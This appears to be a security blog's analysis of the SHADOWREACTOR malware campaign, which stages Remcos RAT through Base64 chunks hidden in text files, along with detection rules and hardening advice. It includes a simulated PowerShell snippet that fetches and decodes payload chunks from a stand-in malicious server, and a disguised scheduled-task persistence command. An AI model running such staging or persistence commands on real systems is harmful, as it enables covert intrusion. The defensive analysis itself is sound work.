
Introduction:
A sophisticated malware campaign dubbed SHADOWREACTOR is leveraging a deceptively simple technique to bypass security filters: delivering malware hidden within plain-text `.txt` files. This method exploits the trust afforded to common file types and uses living-off-the-land tools like PowerShell to reconstruct and execute malicious payloads entirely in memory, leaving minimal forensic evidence. The campaign ultimately deploys the powerful Remcos Remote Access Trojan (RAT), giving attackers full control over compromised systems.
Learning Objectives:
- Understand the technical lifecycle of the SHADOWREACTOR campaign, from initial text file to RAT execution.
- Learn to identify indicators of compromise (IoCs) and commands for detecting in-memory payload reconstruction.
- Implement defensive strategies and hardening techniques to mitigate threats using similar “text-only” staging and living-off-the-land binaries (LOLBins).
You Should Know:
1. The Attack Lifecycle: From Benign Text to Malicious Binary
The attack begins with the delivery of what appear to be harmless text files, such as `qpwoe32.txt` or `config.txt`. These files contain the binary code of the next-stage loader, but encoded and split into chunks stored as text strings. This text-based delivery is highly effective at evading email gateways and network security solutions that often whitelist `.txt` files or perform only shallow inspection of them.
Step-by-Step Guide:
Step 1: Delivery & Execution: The victim is tricked into opening a phishing email or downloading a document that initiates the process. A script (often a macro or a script within a document) is executed.
Step 2: Fetching & Reconstruction: The script calls PowerShell to fetch the chunked text files from a remote server. A PowerShell script then concatenates the text chunks and decodes them (often from Base64) back into a binary executable (.exe or .dll) directly in system memory, without writing the final file to disk.
Example PowerShell Reconstruction Command (Simulated Attacker Activity):

```powershell
# This mimics how an attacker might fetch and assemble a Base64-encoded payload from multiple text URLs
$chunk1 = (Invoke-WebRequest -Uri "hxxp://malicious-server[.]com/config_part1.txt").Content
$chunk2 = (Invoke-WebRequest -Uri "hxxp://malicious-server[.]com/config_part2.txt").Content
$fullBase64 = $chunk1 + $chunk2
$binaryBytes = [System.Convert]::FromBase64String($fullBase64)
```
Step 3: In-Memory Loader Execution: The reconstructed binary, a .NET Reactor-protected loader, is executed via reflective loading techniques (e.g., Invoke-ReflectivePEInjection). This loader resides only in memory, making it hard for traditional antivirus to scan.
2. Evasion Core: .NET Reactor and Reflective Loading
The reconstructed binary is not the final payload but a protected loader. It is obfuscated with .NET Reactor, a commercial protector that encrypts code, embeds anti-debugging tricks, and confuses analysis tools. Its primary role is to stay hidden, decode the next stage, and inject it into a legitimate process.
Step-by-Step Guide:
Step 1: Loader Activation: The in-memory .NET binary is activated. It first performs environment checks to avoid sandboxes.
Step 2: Payload Decryption: It contains an encrypted blob—the final Remcos RAT payload. The loader uses a hard-coded decryption routine to reveal the RAT’s binary in memory.
Step 3: Process Hollowing/Injection: The loader then uses a technique like process hollowing. It may start a legitimate Windows process (e.g., explorer.exe) in a suspended state, hollows out its memory, and replaces it with the Remcos binary before resuming the thread. This masks Remcos as a trusted process.
Detection Command (Windows): Look for suspicious child processes of script hosts.
In a Security Information and Event Management (SIEM) or EDR query language, you might look for a process-creation event matching:

```
Parent Image = "C:\Windows\System32\wscript.exe" OR Parent Image ENDS WITH "\powershell.exe"
AND (Child Image CONTAINS "\Temp\" OR Child Image CONTAINS "explorer" with unusual command-line arguments)
```
3. The Final Payload: In-Memory Deployment of Remcos RAT
The end goal is the stealthy execution of Remcos RAT, a full-featured remote access tool marketed as legitimate software but widely abused by threat actors. Its in-memory deployment is a critical evasion step.
Step-by-Step Guide:
Step 1: Execution: The hollowed process (e.g., explorer.exe) now executes the Remcos code from within its memory space.
Step 2: Persistence: Remcos establishes persistence via Registry Run keys or scheduled tasks.
Example Remcos persistence command (simulated):

```cmd
schtasks /create /tn "WindowsUpdateCheck" /tr "C:\Windows\System32\rundll32.exe C:\Users\%USERNAME%\AppData\Local\Temp\library.dll,Start" /sc hourly /mo 1 /f
```
Step 3: Command & Control (C2): It calls home to an attacker-controlled server, awaiting commands for keylogging, screen capture, file theft, and remote control.
4. Detection Strategies: Hunting for Text-Based Staging
Defense requires a focus on process behavior and network anomalies, not just file signatures.
Step-by-Step Guide:
Step 1: Enable Enhanced Logging: Ensure PowerShell script block logging and Module logging are enabled.
Group Policy or local configuration path: Administrative Templates -> Windows Components -> Windows PowerShell
Step 2: Hunt for LOLBin Sequences: Create detection rules for sequences like:
1. `mshta.exe` or `wscript.exe` spawning `powershell.exe`.
2. That `powershell.exe` process making HTTP/HTTPS requests (to fetch `.txt` files).
3. That `powershell.exe` process subsequently creating or injecting into a new, suspicious process.
Step 3: Network Traffic Analysis: Use firewalls or IDS/IPS to flag multiple small `.txt` file downloads by an endpoint tool like PowerShell, especially to newly registered or suspicious domains.
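A minimal hunt for the Step 2 sequence (and for the parent/child query given in the Evasion Core section), written as an added Python example rather than anything from the original report: it walks constructed Sysmon-style events (IDs 1, 3 and 8) and reports only a `powershell.exe` that was spawned by a script host and then both reached the network and created or injected a process. Field names follow Sysmon's; the process IDs and hostnames in the sample are made up.

```python
# Hunts Sysmon-style telemetry (ID 1 process create, 3 network connect,
# 8 CreateRemoteThread) for: script host -> powershell.exe -> network -> new process.
from collections import defaultdict

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()   # file name of a Windows path

def hunt_lolbin_chain(events):
    """Findings for each powershell.exe spawned by a script host that then
    both reached the network and created or injected a process."""
    suspect_ps = {}               # pid -> parent image
    network = defaultdict(list)   # pid -> destinations contacted
    followup = defaultdict(list)  # pid -> processes created or injected
    for ev in events:             # assumed to be in time order
        eid = ev["EventID"]
        if eid == 1:
            if (basename(ev["Image"]) == "powershell.exe"
                    and basename(ev["ParentImage"]) in SCRIPT_HOSTS):
                suspect_ps[ev["ProcessId"]] = ev["ParentImage"]
            elif ev["ParentProcessId"] in suspect_ps:
                followup[ev["ParentProcessId"]].append(ev["Image"])
        elif eid == 3 and ev["ProcessId"] in suspect_ps:
            network[ev["ProcessId"]].append(ev["DestinationHostname"])
        elif eid == 8 and ev["SourceProcessId"] in suspect_ps:
            followup[ev["SourceProcessId"]].append(ev["TargetImage"])
    return [
        {"pid": pid, "parent": parent,
         "destinations": network[pid], "followup": followup[pid]}
        for pid, parent in suspect_ps.items()
        if network[pid] and followup[pid]
    ]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; PIDs and hostnames are placeholders
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 3988,
     "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"EventID": 3, "ProcessId": 4120, "DestinationHostname": "staging.example.invalid"},
    {"EventID": 1, "ProcessId": 4300, "ParentProcessId": 4120,
     "Image": r"C:\Windows\explorer.exe", "ParentImage": PS},
    # An admin opening PowerShell from Explorer shows the same later steps but is not flagged.
    {"EventID": 1, "ProcessId": 5010, "ParentProcessId": 1200,
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 5010, "DestinationHostname": "updates.example.invalid"},
]
if __name__ == "__main__":
    for finding in hunt_lolbin_chain(SAMPLE_EVENTS):
        print(finding)
```

The Step 3 network check complements this: a flagged PowerShell whose destinations are several small `.txt` fetches from one newly registered domain is the strongest signal.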
5. Mitigation and Hardening Recommendations
Proactive hardening can prevent successful exploitation.
Step-by-Step Guide:
Step 1: Restrict PowerShell: Use Constrained Language Mode and limit PowerShell execution to signed scripts in high-risk environments.
```powershell
# Check current session language mode
$ExecutionContext.SessionState.LanguageMode
```
Step 2: Application Control: Deploy application allow-listing solutions like Windows Defender Application Control to block unauthorized binaries, including those attempting to run from memory or temp directories.
Step 3: Email & Web Filtering: Configure filters to inspect the content of `.txt` files for large blocks of Base64 or hex codes, not just the file extension. Treat all downloadable text files from the web with caution.
Step 4: Principle of Least Privilege: Ensure users operate with standard, non-administrative privileges to significantly hinder persistence mechanisms and system-wide exploitation.
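An added example (not from the original report) of the content check in Step 3: a Python filter that flags a text body containing a long Base64 or hex run, decodes the run's 4-character-aligned prefix so that a chunk cut mid-stream still reveals a PE `MZ` header, and is tried against a constructed config file and the two halves of a constructed Base64 blob. The run threshold of 200 characters is an assumed tuning value.

```python
import base64
import binascii
import re

# Long unbroken runs of the Base64 alphabet (optionally padded) or of hex digits.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){100,}")

def _decode_prefix(run):
    """Decode the part of a Base64 run that falls on a 4-char boundary, so a
    chunk cut mid-stream still yields its leading bytes for a header check."""
    usable = run[: len(run) // 4 * 4]
    try:
        return base64.b64decode(usable, validate=True)
    except binascii.Error:
        return b""

def inspect_text(content):
    """Verdict for one text body. Newlines are joined so line-wrapped blobs
    form one run; spaces are kept so prose does not collapse into a run."""
    flat = content.replace("\r", "").replace("\n", "")
    b64 = max(B64_RUN.findall(flat), key=len, default="")
    hx = max(HEX_RUN.findall(flat), key=len, default="")
    if b64:
        blob = _decode_prefix(b64)
    elif hx:
        blob = bytes.fromhex(hx[:64])
    else:
        blob = b""
    longest = max(len(b64), len(hx))
    verdict = {
        "encoded_run": longest,
        "run_ratio": round(longest / max(len(flat), 1), 2),
        "pe_header": blob.startswith(b"MZ"),
    }
    # Flag a file that is mostly one blob, or whose blob decodes to a PE stub.
    verdict["suspicious"] = verdict["pe_header"] or verdict["run_ratio"] > 0.8
    return verdict

# Constructed samples: a harmless config file and the two chunks of a
# Base64-encoded stand-in for a PE file (an "MZ" header plus filler bytes).
BENIGN = "server=updates.example.invalid\nport=443\nretry=3\n"
FAKE_PE_B64 = base64.b64encode(b"MZ" + b"\x90" * 300).decode()
CHUNK1, CHUNK2 = FAKE_PE_B64[:257], FAKE_PE_B64[257:]

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("chunk1", CHUNK1), ("chunk2", CHUNK2)):
        print(name, inspect_text(body))
```

The trailing chunk passes on its own because it is shorter than the run threshold, which is why the network-level correlation in the previous section (several small `.txt` downloads by one endpoint tool) has to complement per-file inspection.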
What Undercode Say:
Evolution of Evasion: SHADOWREACTOR signifies a mature shift towards “content-agnostic delivery,” where the file extension is irrelevant. The malware is the text itself. This forces defenders to move beyond file-type-based filtering to deep content analysis and behavioral monitoring.
The Power of LOLBins: The campaign’s heavy reliance on PowerShell underscores the persistent security dilemma of powerful administrative tools. They are essential for IT management but are a primary attacker weapon. Effective defense now requires granular logging, behavioral analytics, and strict control over these trusted binaries.
The technical analysis of SHADOWREACTOR reveals a blueprint for modern intrusion: bypass perimeter security with trusted formats, leverage pre-installed system tools for execution, and employ multiple layers of obfuscation to protect the payload. The lack of a traditional malware binary on disk challenges traditional antivirus paradigms, pushing the industry further towards endpoint detection and response (EDR) solutions focused on process lineage and anomalous behavior. This campaign is not about a novel vulnerability, but about the clever, persistent misuse of standard system features.
Prediction:
The “text-only” staging technique will be rapidly adopted by other malware families and initial access brokers due to its high success rate against static defenses. We will see an increase in campaigns using chunked payloads hidden in various plain-text or configuration file formats (e.g., .json, .yml, .csv). Furthermore, the use of protectors like .NET Reactor will become standard for loaders, increasing the time and cost of analysis. This will accelerate the integration of AI/ML models in security products to detect anomalous scripting sequences and subtle memory injection patterns, moving the primary battleground from the network perimeter to the endpoint’s memory and process behavior. Defenders must prioritize visibility into PowerShell, WMI, and MSHTA activity across their networks.
Reported By: Jamie Williams – Hackers Feeds